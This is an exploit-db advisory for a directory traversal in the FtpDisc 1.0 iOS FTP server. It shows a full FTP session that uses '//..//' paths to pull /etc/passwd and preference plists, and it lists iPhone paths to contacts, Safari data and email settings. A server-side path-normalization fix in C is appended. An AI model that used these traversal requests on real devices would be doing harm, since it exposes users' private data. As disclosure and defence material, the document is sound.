
iOS FtpDisc 1.0 - Directory Traversal

22 Feb 2011 00:00:00
Reported by: R3d@l3rt, Sp@2K, Sunlight
Type: exploitdb
Source: www.exploit-db.com

FtpDisc v1.0 iOS Directory Traversal Vulnerability

Code
# Exploit Title: FtpDisc v1.0 for iPhone / iPod touch, Directory Traversal 
# Date: 02/22/2011
# Author: R3d@l3rt, Sp@2K, Sunlight
# Software Link: http://itunes.apple.com/kr/app/ftpdisc-lite-pdf-reader/id329157971?mt=8
# Version: 1.0
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware  

# There is a directory traversal vulnerability in FtpDisc.
# Exploit Testing

C:\>ftp
ftp> open 192.168.0.70 2121
Connected to 192.168.0.70.
220 Mocha FTP Server
User (192.168.0.70:(none)): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls
drwxrwxrwx   1 nobody    nobody      68         Jan  3 17:14 documents
drwxrwxrwx   1 nobody    nobody      68         Jan  3 17:14 other
drwxrwxrwx   1 nobody    nobody      68         Jan  3 17:14 photos
drwxrwxrwx   1 nobody    nobody      68         Jan  3 17:14 video
226 Transfer completed
ftp: 277 bytes received in 0.00Seconds 277000.00Kbytes/sec.
ftp> cd //..//..//..//..//..//..//
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls
-r-xr-xr-x   1 nobody    nobody      0          Aug  3  201012:41 .file
dr-xr-xr-x   1 nobody    nobody      1428       Feb  8 12:50 Applications
dr-xr-xr-x   1 nobody    nobody      68         Aug 19  2010 4:10 Developer
dr-xr-xr-x   1 nobody    nobody      884        Jan 12 12:53 Library
dr-xr-xr-x   1 nobody    nobody      102        Aug 19  2010 4:18 System
dr-xr-xr-x   1 nobody    nobody      306        Feb  8 11:48 User
dr-xr-xr-x   1 nobody    nobody      2074       Jan 13  9:52 bin
dr-xr-xr-x   1 nobody    nobody      68         Oct 26  2010 1:19 boot
-r-xr-xr-x   1 nobody    nobody      638        Jan 25 15:30 control
dr-xr-xr-x   1 nobody    nobody      68         Aug  3  201012:41 cores
   1 nobody    nobody      68           1  dev
dr-xr-xr-x   1 nobody    nobody      918        Jan 26 11:34 etc
dr-xr-xr-x   1 nobody    nobody      68         Oct 26  2010 1:19 lib
dr-xr-xr-x   1 nobody    nobody      68         Oct 26  2010 1:19 mnt
dr-xr-xr-x   1 nobody    nobody      136        Oct 23  201015:12 private
dr-xr-xr-x   1 nobody    nobody      1666       Jan 13  9:52 sbin
drwxrwxrwx   1 nobody    nobody      272        Feb 22 16:02 tmp
dr-xr-xr-x   1 nobody    nobody      374        Jan 13  9:52 usr
dr-xr-xr-x   1 nobody    nobody      1088       Oct 26  2010 1:19 var
226 Transfer completed
ftp: 1461 bytes received in 0.02Seconds 91.31Kbytes/sec.
ftp> get ../../../../../../etc/passwd
200 PORT command successful.
550 cannot find the file
ftp> get /../../../../../../etc/passwd
200 PORT command successful.
150 Opening ASCII mode data connection for /../../../../../../etc/passwd
226 Transfer completed
ftp: 785 bytes received in 0.00Seconds 785000.00Kbytes/sec.
ftp> get //..//..//..//..//..//..//private/var/mobile/Library/Preferences/com.apple.Maps.plist
200 PORT command successful.
150 Opening ASCII mode data connection for //..//..//..//..//..//..//private/var/mobile/Library/Preferences/com.apple.Maps.plist
226 Transfer completed
ftp: 1239 bytes received in 0.00Seconds 1239000.00Kbytes/sec.
ftp> quit
221 Goodbye

C:\>type passwd
#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file.  Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

C:\>type com.apple.Maps.plist
bplist00?

C:\>type com.apple.conference.plist
bplist00?_restoredFromBackup\natTypeCache?
_DIPv4.Router=192.168.0.1;IPv4.RouterHardwareAddress=1c:bd:b9:XX:XX:XX_EIPv4.R
outer=192.168.11.1;IPv4.RouterHardwareAddress=00:24:a5:XX:XX:XX? XnatFlag
C:\>



# iPhone inside information

1. Phone Book
 - /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
     
2. Safari Favorites List
 - /private/var/mobile/Library/Safari

3. Users E-mail Information
 - /private/var/mobile/Library/Preferences/com.apple.accountsettings.plist

4. IPv4 Router Information
 - /private/var/mobile/Library/Preferences/com.apple.conference.plist
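
For the server side, the missing control is path confinement: every CWD/RETR/LIST argument has to be normalized against a virtual root before it touches the filesystem. The following is an added example, not code from the advisory or from FtpDisc; the function name ftp_resolve and its parameters are hypothetical.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: resolve an FTP path argument (CWD/RETR/LIST) against
 * the session's virtual working directory. The result is a normalized virtual
 * path such as "/" or "/photos/a.jpg" that never climbs above the virtual
 * root. Returns 0 on success, -1 if the path does not fit. */
int ftp_resolve(const char *vcwd, const char *arg, char *out, size_t outsz)
{
    char buf[1024];
    size_t len = 1;
    /* Absolute arguments restart at the virtual root, relative ones at vcwd. */
    int n = snprintf(buf, sizeof buf, "%s/%s", arg[0] == '/' ? "" : vcwd, arg);
    if (n < 0 || (size_t)n >= sizeof buf || outsz < 2)
        return -1;
    out[0] = '/';
    out[1] = '\0';
    /* strtok skips empty segments, so "//..//" is treated like "/../".
     * (Use strtok_r in a multi-threaded server.) */
    for (char *seg = strtok(buf, "/"); seg; seg = strtok(NULL, "/")) {
        if (strcmp(seg, ".") == 0)
            continue;
        if (strcmp(seg, "..") == 0) {
            /* Pop one component; at the virtual root ".." is a no-op. */
            char *slash = strrchr(out, '/');
            len = (slash == out) ? 1 : (size_t)(slash - out);
            out[len] = '\0';
            continue;
        }
        size_t sl = strlen(seg);
        if (len + sl + 2 > outsz)
            return -1;
        if (len > 1)
            out[len++] = '/';
        memcpy(out + len, seg, sl + 1);
        len += sl;
    }
    return 0;
}

int main(void)
{
    /* Path arguments taken from the session above. */
    const char *args[] = { "//..//..//..//..//..//..//",
                           "/../../../../../../etc/passwd",
                           "../../../../../../etc/passwd" };
    char v[256];
    for (int i = 0; i < 3; i++)
        if (ftp_resolve("/photos", args[i], v, sizeof v) == 0)
            printf("%-32s -> %s\n", args[i], v);
    return 0;
}
```

The result is only a lexical path: append it to the on-disk share directory, then confirm with realpath() that the final target still lies under that directory, so a symlink inside the share cannot lead out.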

Vulners AI Score: 7.4 (High risk)